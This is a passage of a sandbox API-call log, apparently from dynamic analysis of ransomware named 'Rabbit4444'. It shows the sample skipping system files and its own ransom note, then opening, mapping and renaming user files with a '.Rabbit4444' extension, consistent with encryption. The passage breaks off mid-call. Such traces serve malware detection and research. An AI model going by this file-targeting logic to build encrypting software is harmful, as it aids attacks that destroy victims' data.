(lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2="..") returned 1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2="windows") returned -1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2="bootmgr") returned -1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2="pagefile.sys") returned -1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2="boot") returned -1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2="ids.txt") returned -1 [0068.117] lstrcmpiW (lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", lpString2="NTUSER.DAT") returned -1 [0068.117] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}" | out: lpString1="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}") returned="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}" [0068.117] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{92B80E70-6ED3-42E7-830D-EF665C1DCD71}", dwFileAttributes=0x0) returned 1 [0068.117] lstrlenW (lpString="{92B80E70-6ED3-42E7-830D-EF665C1DCD71}") returned 38 [0068.117] lstrlenW (lpString="Rabbit4444") returned 10 [0068.117] lstrcmpiW (lpString1="65C1DCD71}", lpString2="Rabbit4444") returned -1 [0068.117] lstrlenW (lpString=".dll") returned 4 [0068.117] lstrcmpiW (lpString1="D71}", lpString2=".dll") returned 1 [0068.117] lstrlenW (lpString=".lnk") returned 4 [0068.117] lstrcmpiW (lpString1="D71}", lpString2=".lnk") returned 1 [0068.117] lstrlenW (lpString=".ini") returned 4 [0068.117] lstrcmpiW (lpString1="D71}", lpString2=".ini") returned 1 [0068.117] lstrlenW (lpString=".sys") returned 4 [0068.118] lstrcmpiW (lpString1="D71}", lpString2=".sys") returned 1 [0068.118] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{92B80E70-6ED3-42E7-830D-EF665C1DCD71}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{92b80e70-6ed3-42e7-830d-ef665c1dcd71}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.118] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.118] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15942867490) returned 1 [0068.118] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0068.118] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.119] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.124] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15943438115) returned 1 [0068.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0068.124] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.124] CloseHandle (hObject=0x29c) returned 1 [0068.124] CloseHandle (hObject=0x280) returned 1 [0068.124] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{92B80E70-6ED3-42E7-830D-EF665C1DCD71}.Rabbit4444") returned 156 [0068.124] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{92B80E70-6ED3-42E7-830D-EF665C1DCD71}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{92b80e70-6ed3-42e7-830d-ef665c1dcd71}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{92B80E70-6ED3-42E7-830D-EF665C1DCD71}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{92b80e70-6ed3-42e7-830d-ef665c1dcd71}.rabbit4444"), dwFlags=0x1) returned 1 [0068.125] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9927cac9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9927cac9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c63e56, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", cAlternateFileName="{9485C~1")) returned 1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2="Rabbit4444.exe") returned -1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2=".") returned 1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2="..") returned 1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2="windows") returned -1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2="bootmgr") returned -1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2="pagefile.sys") returned -1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2="boot") returned -1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2="ids.txt") returned -1 [0068.125] lstrcmpiW (lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", lpString2="NTUSER.DAT") returned -1 [0068.125] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}" | out: lpString1="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}") returned="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}" [0068.125] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9485C3DE-E1A0-4074-8C1B-4DC45764656C}", dwFileAttributes=0x0) returned 1 [0068.125] lstrlenW (lpString="{9485C3DE-E1A0-4074-8C1B-4DC45764656C}") returned 38 [0068.125] lstrlenW (lpString="Rabbit4444") returned 10 [0068.125] lstrcmpiW (lpString1="45764656C}", lpString2="Rabbit4444") returned -1 [0068.125] lstrlenW (lpString=".dll") returned 4 [0068.125] lstrcmpiW (lpString1="56C}", lpString2=".dll") returned 1 [0068.126] lstrlenW (lpString=".lnk") returned 4 [0068.126] lstrcmpiW (lpString1="56C}", lpString2=".lnk") returned 1 [0068.126] lstrlenW (lpString=".ini") returned 4 [0068.126] lstrcmpiW (lpString1="56C}", lpString2=".ini") returned 1 [0068.126] lstrlenW (lpString=".sys") returned 4 [0068.126] lstrcmpiW (lpString1="56C}", lpString2=".sys") returned 1 [0068.126] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9485C3DE-E1A0-4074-8C1B-4DC45764656C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9485c3de-e1a0-4074-8c1b-4dc45764656c}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.126] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.126] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15943682742) returned 1 [0068.126] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.126] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0068.126] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0068.126] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.127] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.128] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.129] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.129] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.129] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.129] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15943936656) returned 1 [0068.129] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0068.129] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0068.129] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.129] CloseHandle (hObject=0x29c) returned 1 [0068.129] CloseHandle (hObject=0x280) returned 1 [0068.129] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9485C3DE-E1A0-4074-8C1B-4DC45764656C}.Rabbit4444") returned 156 [0068.129] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9485C3DE-E1A0-4074-8C1B-4DC45764656C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9485c3de-e1a0-4074-8c1b-4dc45764656c}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9485C3DE-E1A0-4074-8C1B-4DC45764656C}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9485c3de-e1a0-4074-8c1b-4dc45764656c}.rabbit4444"), dwFlags=0x1) returned 1 [0068.130] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38231567, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x38231567, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44c6174b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{983FD517-E332-4EC3-912D-37488A0D4CAD}", cAlternateFileName="{983FD~1")) returned 1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2="Rabbit4444.exe") returned -1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2=".") returned 1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2="..") returned 1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2="windows") returned -1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2="bootmgr") returned -1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2="pagefile.sys") returned -1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2="boot") returned -1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2="ids.txt") returned -1 [0068.131] lstrcmpiW (lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}", lpString2="NTUSER.DAT") returned -1 [0068.131] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{983FD517-E332-4EC3-912D-37488A0D4CAD}" | out: lpString1="{983FD517-E332-4EC3-912D-37488A0D4CAD}") returned="{983FD517-E332-4EC3-912D-37488A0D4CAD}" [0068.131] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{983FD517-E332-4EC3-912D-37488A0D4CAD}", dwFileAttributes=0x0) returned 1 [0068.131] lstrlenW (lpString="{983FD517-E332-4EC3-912D-37488A0D4CAD}") returned 38 [0068.131] lstrlenW (lpString="Rabbit4444") returned 10 [0068.131] lstrcmpiW (lpString1="88A0D4CAD}", lpString2="Rabbit4444") returned -1 [0068.131] lstrlenW (lpString=".dll") returned 4 [0068.131] lstrcmpiW (lpString1="CAD}", lpString2=".dll") returned 1 [0068.131] lstrlenW (lpString=".lnk") returned 4 [0068.131] lstrcmpiW (lpString1="CAD}", lpString2=".lnk") returned 1 [0068.132] lstrlenW (lpString=".ini") returned 4 [0068.132] lstrcmpiW (lpString1="CAD}", lpString2=".ini") returned 1 [0068.132] lstrlenW (lpString=".sys") returned 4 [0068.132] lstrcmpiW (lpString1="CAD}", lpString2=".sys") returned 1 [0068.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{983FD517-E332-4EC3-912D-37488A0D4CAD}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{983fd517-e332-4ec3-912d-37488a0d4cad}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.132] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.132] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15944277279) returned 1 [0068.132] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.132] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.132] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0068.132] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.133] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0068.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0068.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.135] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15944569100) returned 1 [0068.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0068.135] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.135] CloseHandle (hObject=0x29c) returned 1 [0068.135] CloseHandle (hObject=0x280) returned 1 [0068.135] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{983FD517-E332-4EC3-912D-37488A0D4CAD}.Rabbit4444") returned 156 [0068.135] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{983FD517-E332-4EC3-912D-37488A0D4CAD}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{983fd517-e332-4ec3-912d-37488a0d4cad}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{983FD517-E332-4EC3-912D-37488A0D4CAD}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{983fd517-e332-4ec3-912d-37488a0d4cad}.rabbit4444"), dwFlags=0x1) returned 1 [0068.136] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bc0fbe3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9bc0fbe3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c63e56, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", cAlternateFileName="{9A290~1")) returned 1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2="Rabbit4444.exe") returned -1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2=".") returned 1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2="..") returned 1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2="windows") returned -1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2="bootmgr") returned -1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2="pagefile.sys") returned -1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2="boot") returned -1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2="ids.txt") returned -1 [0068.136] lstrcmpiW (lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", lpString2="NTUSER.DAT") returned -1 [0068.136] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}" | out: lpString1="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}") returned="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}" [0068.136] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9A290AB2-7828-46C3-A57F-0DEE793F6B93}", dwFileAttributes=0x0) returned 1 [0068.137] lstrlenW (lpString="{9A290AB2-7828-46C3-A57F-0DEE793F6B93}") returned 38 [0068.137] lstrlenW (lpString="Rabbit4444") returned 10 [0068.137] lstrcmpiW (lpString1="E793F6B93}", lpString2="Rabbit4444") returned -1 [0068.137] lstrlenW (lpString=".dll") returned 4 [0068.137] lstrcmpiW (lpString1="B93}", lpString2=".dll") returned 1 [0068.137] lstrlenW (lpString=".lnk") returned 4 [0068.137] lstrcmpiW (lpString1="B93}", lpString2=".lnk") returned 1 [0068.137] lstrlenW (lpString=".ini") returned 4 [0068.137] lstrcmpiW (lpString1="B93}", lpString2=".ini") returned 1 [0068.137] lstrlenW (lpString=".sys") returned 4 [0068.137] lstrcmpiW (lpString1="B93}", lpString2=".sys") returned 1 [0068.137] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9A290AB2-7828-46C3-A57F-0DEE793F6B93}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{9a290ab2-7828-46c3-a57f-0dee793f6b93}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.137] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.137] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15944804094) returned 1 [0068.137] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.137] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0068.137] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0068.137] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.138] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.139] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.140] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.140] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.140] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.140] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15945059918) returned 1 [0068.140] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0068.140] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0068.140] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.140] CloseHandle (hObject=0x29c) returned 1 [0068.140] CloseHandle (hObject=0x280) returned 1 [0068.140] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9A290AB2-7828-46C3-A57F-0DEE793F6B93}.Rabbit4444") returned 156 [0068.140] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{9A290AB2-7828-46C3-A57F-0DEE793F6B93}" (normalized: 